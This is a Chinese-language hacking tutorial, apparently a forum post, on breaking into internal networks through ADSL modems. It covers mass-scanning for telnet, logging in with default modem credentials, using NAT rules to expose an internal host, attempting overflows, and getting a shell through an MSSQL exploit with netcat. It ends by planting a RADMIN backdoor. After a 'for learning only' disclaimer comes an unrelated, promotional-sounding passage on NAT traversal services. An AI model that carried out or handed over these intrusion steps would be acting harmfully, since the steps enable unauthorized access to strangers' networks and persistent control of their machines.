也许看烂了网上已有的常规黑客攻击手段,对一些陈旧的入侵手法早已厌烦,近来我对ADSL MODEM的路由功能产生了浓厚的兴趣,经过一番努力,我终于找到了穿透ADSL路由入侵内网的方法,在这里和各位一起分享我的心得。
一.扫描
现在很多ADSL MODEM都是通过80、23、21三个端口来管理,但80、21端口有很多服务器都有打开,没什么特征性,于是我选择了23端口。打开我的至爱:SUPPERSCAN,填上我所在地区的IP段,(跨多几段都没关系,反正SUPPERSCAN的速度就是快)眨眼间,结果出来了。开23的主机还真不少,我挑了几台出来,在浏览器那里输入IP:218.xxx.xxx.xxx,OK。登陆对话框出来了,输入USER:ADSL pass:adsl1234(因为我这里的adsl modem一般是华硕的,缺省是adsl adsl1234),好了,一矢中的,现在我就是上帝。
二.映射
入侵已经成功了一半,要进一步入侵内网,我门要进行端口映射,但是我连内网的拓扑都不知道(更不用说内网主机的端口开放情况了)又怎么映射呢?在此,我选择了猜测。一般来说,MODEM的内网IP缺省是192.168.1.1,而大多数就把自己主机的IP设成192.168.1.2。因此我们只要试试把192.168.1.2的端口映射出来就行了(但如果使用了dhcp就麻烦了)但是 192.168.1.2到底开放了什么端口,我们根本就不知道啊。呵呵,既然不知道,那么我就把他整台主机透明地映射到外网。具体做法如下:进入NAT选项---添加NAT规则---BAMID---填入主机IP:192.168.1.2,到此192.168.1.2已经透明地映射到 192.168.1.1上,我们访问ADSL MODEM就等于访问主机192.168.1.2了。
三.检测漏洞
现在我们再请出SUPPERSCAN对218.xxx.xxx.xxx进行扫描,呵,看到没有?扫描结果已经不同了,开放的端口是139、1433等,刚才只是开放了80、23、21而已(也就是说我们的映射已经成功了)该是X-SCAN 出手了,用它来扫弱口令最好不过了,但扫描的结果令人失望,一个弱口令也没有,看来管理员还不算低啊。
四.溢出
既然没有弱口令,也没开80,那只好从逸出方面着手了,但没开80、21也就webdav .sevr-u的溢出没戏了,很自然,我向导了RPC溢出,但实践证明RPC溢出也是不行的,LSASS溢出也不行
五.募然回首,那人却在,灯火阑珊处
看来这个管理员还是比较负责的,该打的补丁都打上了。这时侯,我的目光转移到1433上了(嘿,不知道他打了SQL补丁没有?,心动不如行动,现在只好死马当活马医了,于是:
nc -v -l 99 sql2 218.xxx.xxx.xxx 0 218.xxx.xxx.xxx 99 |
这样就成功得到一个shell了。
六.设置后门
到这里,我们的入侵已经成功了,余下的是扫尾留后门,至于后门,我一般都是用FTP上传RADMIN上去的,呵呵,这里不详谈了,相信各位都知道。
PS:本文仅用于学习技术,使得网络管理人员能够防御网络攻击,请勿用于非法用途,否则后果自负承担所有责任 七、内网穿透原理 内网穿透原理是什么?总结下内网穿透技术有这么几种:1,通过公网服务器转发。这是目前市场上大多三方的内网穿透服务方式。速度受转发限制。2,P2P穿透,端对端连接通信,即常说的UDP打洞方式。目前也有不少是专注做这类穿透接口的服务。 受国内复杂网络环境影响打洞成功机率不高。3,通过公网服务器响应对二端握手穿透,穿透成功时直接二端P2P打洞直联,如二端网络都限制了P2P等原因穿透失败时再走公网服务器转发,如内网穿透nat123端口映射服务即使用了这种方案,既确保了连通性又有效发挥了二端网络带宽速度。 内网穿透,即内网映射,内网端口映射,可以将内网地址转化变为公网地址,可以将内网服务器和网站和应用映射外网公网访问连接,可以将局域网变公网,解决无公网IP的困境。我们常常会在远程办公OA,ERP,数据库,SVN,FTP,路由器等跨网访问场景时使用内网穿透解决方案。
|